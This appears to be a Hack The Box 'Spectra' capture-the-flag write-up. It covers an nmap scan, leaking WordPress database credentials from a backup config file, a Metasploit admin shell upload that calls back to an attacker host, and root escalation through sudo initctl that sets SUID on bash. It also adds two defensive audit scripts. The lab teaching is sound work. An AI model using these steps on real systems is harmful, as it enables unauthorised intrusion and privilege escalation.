Today we are going to accept the boot2root challenge of Spectra, a Hack The Box lab. Through this lab we are going to check our skills in WordPress exploitation and basic privilege escalation.
Table of Contents
Reconnaissance
- Nmap
Enumeration
- Website enumeration
Exploitation
- WordPress Metasploit
Privilege Escalation
- Abusing Sudo rights
Reconnaissance
Let's start our journey.
Code:
nmap -A 10.129.223.138

Through the Nmap scan we learn that there are three open ports: port 22 (SSH, OpenSSH 8.1), port 80 (HTTP) and port 3306 (MySQL).
First, we open port 80 in the web browser and get a simple page with two links: Software Issue Tracker and Test.
Code:
http://10.129.223.138

Enumeration
Both links redirect to spectra.htb, so we need to add an entry for it to the hosts file.
Code:
cat /etc/hosts

Now we explore both links found on port 80. Once we click on the Test link we get "Error establishing a database connection". It seems nothing important.

We navigate to spectra.htb/testing in the web browser and find two WordPress config files, wp-config.php and wp-config.php.save.

wp-config.php.save is a leftover copy of the base WordPress configuration file. After fetching it with curl we find something interesting in it: the MySQL database credentials, username "devtest" and password devteam01.
Code:
curl http://spectra.htb/testing/wp-config.php.save

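As an added defender-side check, not code from the original walkthrough, the following POSIX shell functions scan a web document root for leftover copies of PHP files such as wp-config.php.save. A suffix after .php stops the PHP handler from executing the file, so the web server serves its source as plain text, which is exactly how the database credentials above leaked; the check generalises to any *.php backup or editor file, and the document root path is a parameter.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.
# Looks for leftover copies of PHP files (wp-config.php.save, .bak,
# .orig, editor backups) under a web document root. A suffix after
# .php stops the PHP handler from running the file, so the web server
# sends its source as plain text, including any DB_PASSWORD define.

# Print every PHP leftover under the given document root, one per line.
# Usage: find_config_leftovers /var/www/html
find_config_leftovers() {
    find "$1" -type f \( -name '*.php.*' -o -name '*.php~' \
        -o -name '.*.php.swp' \) 2>/dev/null | sort
}

# Count the leftovers (0 when the root is clean).
count_config_leftovers() {
    find_config_leftovers "$1" | wc -l | tr -d ' '
}

# Report each leftover, flagging those that expose database credentials.
# Returns 0 when nothing was found, 1 otherwise.
check_config_leftovers() {
    root="$1"
    find_config_leftovers "$root" | while IFS= read -r f; do
        if grep -q 'DB_PASSWORD' "$f" 2>/dev/null; then
            echo "LEAK: $f exposes DB_PASSWORD as plain text"
        else
            echo "WARN: $f is a config leftover served as plain text"
        fi
    done
    [ "$(count_config_leftovers "$root")" -eq 0 ]
}
```

Run it from a cron job or CI step against the document root; a non-zero exit means a backup copy is sitting where the web server will hand it out.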
We try to log in to WordPress with them, but unfortunately the credentials found above are not working, and we get the error "Unknown username. Check again or try your email address".
Code:
spectra.htb/main/wp-login.php

Looking back, now it's time to explore the first link, Software Issue Tracker, found on HTTP port 80.
This leads us to a basic WordPress page with the administrator's sample post. We learn from this that the username "administrator" is a viable option. We go to the wp-login page once more to log in.

Great!! We successfully log in and are redirected to the administrator email verification.
Just click on "This email is correct" and get into it.

Exploitation
After some enumeration, we find that the WordPress version is not updated. Accordingly, we use the Metasploit exploit and set the required options, since we have already obtained the username and password, administrator and devteam01 respectively. Below is the module:
Code:
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 10.129.223.138
set targeturi /main
set username administrator
set password devteam01
set lhost 10.10.14.100
exploit

While doing enumeration, we come across another user named "katie".
Code:
cat /etc/passwd

Very soon we find that our current user does not have permission to read user.txt in Katie's home directory.
Code:
cd /home/katie
ls
cat user.txt

After some file enumeration, we find an intriguing script, autologin.conf.orig, in the /opt/ directory.
Code:
cd /opt
ls -la

This script retrieves a password from the passwd file in the /etc/autologin directory.
Code:
cat autologin.conf.orig

I navigate to that directory and grab the password. Next, I try the password against the list of users found above.
Code:
cd /etc/autologin
ls -la
cat passwd

Privilege Escalation
Let's use the credential we enumerated to log in over SSH as user Katie. Using the id command we discover that Katie is a member of the developers group. We next check Katie's sudo rights and discover that the user can run /sbin/initctl as root. initctl is the control utility for the Upstart init daemon on Linux.
Code:
ssh katie@10.129.223.138
id
sudo -l
find / -type f -group developers 2>/dev/null -ls
cat /etc/init/test.conf

Let's abuse the test.conf file and replace the existing script stanza with the following one, which will set the SUID bit on /bin/bash.
Code:
script
chmod +s /bin/bash
end script

Because the user has root permission to run initctl, we can use Katie's sudo privilege to start the test job, which runs the script and sets the SUID bit on /bin/bash.
Code:
sudo /sbin/initctl start test
/bin/bash -p

Kudos!! Finally, we capture the root flag after obtaining a root-privileged shell.
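As an added defender-side audit, not code from the original walkthrough, the POSIX shell functions below check the three conditions the escalation above relied on: a sudo rule granting initctl, an Upstart job file under /etc/init that a non-root user or group can write, and a shell binary carrying the setuid bit (the artefact the escalation leaves behind). File and directory paths are parameters so the checks can be pointed at a test tree; GNU find's -perm /MODE syntax is assumed.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.
# Audits the chain used above: sudo -> initctl -> writable job file
# -> setuid /bin/bash. Each function prints its findings, one per line.

# Print sudoers lines (comments ignored) that grant initctl.
# Usage: sudo_initctl_rules /etc/sudoers
sudo_initctl_rules() {
    grep -v '^[[:space:]]*#' "$1" 2>/dev/null | grep 'initctl' || true
}

# Print Upstart job files writable by group or others.
# Usage: writable_upstart_jobs /etc/init
writable_upstart_jobs() {
    find "$1" -maxdepth 1 -type f -name '*.conf' -perm /022 2>/dev/null | sort
}

# Print shell binaries with the setuid bit set in the given directories.
# Usage: suid_shells /bin /usr/bin
suid_shells() {
    find "$@" -maxdepth 1 -type f -perm -4000 \
        \( -name 'bash' -o -name 'sh' -o -name 'dash' -o -name 'zsh' \) \
        2>/dev/null | sort
}

# Combined verdict: returns 0 when none of the three findings is present.
# Usage: audit_initctl_chain SUDOERS INIT_DIR BIN_DIR...
audit_initctl_chain() {
    sudoers="$1"; initdir="$2"; shift 2
    rc=0
    r=$(sudo_initctl_rules "$sudoers")
    [ -n "$r" ] && { echo "FINDING: sudo grants initctl:"; echo "$r"; rc=1; }
    w=$(writable_upstart_jobs "$initdir")
    [ -n "$w" ] && { echo "FINDING: writable Upstart job(s):"; echo "$w"; rc=1; }
    s=$(suid_shells "$@")
    [ -n "$s" ] && { echo "FINDING: setuid shell(s):"; echo "$s"; rc=1; }
    return $rc
}
```

A sudo rule for initctl is only safe when every job file it can start is root-owned and not group- or world-writable, so the first two findings should be fixed together.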

Author: Nisha Sharma is an experienced and certified security consultant, highly skilled in infrastructure and web pentesting along with SIEM and other security devices.